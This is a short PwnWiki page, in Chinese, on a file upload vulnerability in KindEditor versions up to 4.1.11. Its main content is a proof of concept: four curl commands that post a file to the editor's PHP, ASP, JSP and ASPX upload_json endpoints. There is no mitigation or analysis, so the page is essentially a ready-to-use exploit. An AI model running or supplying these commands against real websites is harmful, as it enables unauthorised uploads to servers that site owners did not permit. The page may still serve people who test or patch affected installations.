Kindeditor 上傳漏洞
From PwnWiki
Revision as of 11:01, 28 April 2021 by Pwnwiki (talk | contribs) (Created page with "==漏洞影響== kindeditor <= 4.1.11 ==POC== <pre> curl -F"[email protected]" http://127.0.0.1/kindeditor/php/upload_json.php?dir=file curl -F"[email protected]" http://127.0.0....")
漏洞影響
kindeditor <= 4.1.11
POC
curl -F"[email protected]" http://127.0.0.1/kindeditor/php/upload_json.php?dir=file curl -F"[email protected]" http://127.0.0.1/kindeditor/asp/upload_json.asp?dir=file curl -F"[email protected]" http://127.0.0.1/kindeditor/jsp/upload_json.jsp?dir=file curl -F"[email protected]" http://127.0.0.1/kindeditor/aspx/upload_json.aspx?dir=file
